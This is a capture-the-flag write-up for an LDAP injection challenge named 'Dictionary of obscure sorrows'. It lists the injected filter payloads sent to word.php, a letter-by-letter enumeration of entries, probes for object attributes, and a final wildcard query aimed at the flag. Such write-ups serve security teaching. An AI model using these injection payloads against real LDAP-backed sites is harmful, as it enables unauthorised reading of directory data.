Tags: web ldap 

Rating: 5.0

# ▼▼▼Dictionary of obscure sorrows(Web:902point、11/531=2.1%)▼▼▼
**This writeup is written by [@kazkiti_ctf](https://twitter.com/kazkiti_ctf)**

There are a lot of obscure sorrows in our world.
Your job is not to find those that are plain in sight;
You need to seek further, look deeper.
Find the word that can not be written.
The most obscure sorrow of them all.


## 【Identify the vulnerability】

GET /word.php?page=*)(ObjectClass=* ⇒Normal response!!
GET /word.php?page=*)(ObjectClass=1  ⇒Query returned empty

**LDAP injection !!**


## 【Search for flag】
GET /word.php?page=%4b*)(objectClass=* HTTP/1.1 K*
GET /word.php?page=%6b*)(objectClass=* HTTP/1.1 k*
GET /word.php?page=%4f*)(objectClass=* HTTP/1.1 O*
GET /word.php?page=%6f*)(objectClass=* HTTP/1.1 o*
GET /word.php?page=%56*)(objectClass=* HTTP/1.1 V*
GET /word.php?page=%76*)(objectClass=* HTTP/1.1 v*
GET /word.php?page=%57*)(objectClass=* HTTP/1.1 W*
GET /word.php?page=%77*)(objectClass=* HTTP/1.1 w*
GET /word.php?page=%41*)(objectClass=* HTTP/1.1 A*
GET /word.php?page=%61*)(objectClass=* HTTP/1.1 a*
GET /word.php?page=%4c*)(objectClass=* HTTP/1.1 L*
GET /word.php?page=%6c*)(objectClass=* HTTP/1.1 l*
GET /word.php?page=%53*)(objectClass=* HTTP/1.1 S*
GET /word.php?page=%73*)(objectClass=* HTTP/1.1 s*
GET /word.php?page=%59*)(objectClass=* HTTP/1.1 Y*
GET /word.php?page=%79*)(objectClass=* HTTP/1.1 y*

Compare with values that exist in html


Discover WORDS!! But it was not a flag...

## 【Search for other attribute values】

`GET /word.php` or `GET /config.php` ※config.php was discovered by the feeling

`Missing RDN inside ObjectClass(document)`

ObjectClass is `document`


## 【Investigate attributes of ObjectClass】

Attribute list of `document`


cn (commonName)
l (localityName)
o (organizationName)
ou (organizationUnitName)


GET /word.php?page=*)(cn=* ⇒ Query returned empty
GET /word.php?page=*)(description=* ⇒ Normal response★
GET /word.php?page=*)(seeAlso=*  ⇒ Query returned empty
GET /word.php?page=*)(l=*   ⇒ Query returned empty
GET /word.php?page=*)(o=*   ⇒ Query returned empty
GET /word.php?page=*)(ou=*  ⇒ Query returned empty
GET /word.php?page=*)(documentTitle=*  ⇒ Query returned empty
GET /word.php?page=*)(documentVersion=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentAuthor=*  ⇒ Query returned empty
GET /word.php?page=*)(documentPublisher=* ⇒ Normal response★


## 【exploit】

The format of flag is known by `noxctf{●●●●●} `

`GET /word.php?page=*)(description=*noxctf*`

HTTP/1.1 302 Found
Date: Sat, 08 Sep 2018 23:41:20 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 3872
Content-Type: text/html; charset=UTF-8

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So many sorrows.

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You can click on any of the links below to reach some more interesting words.



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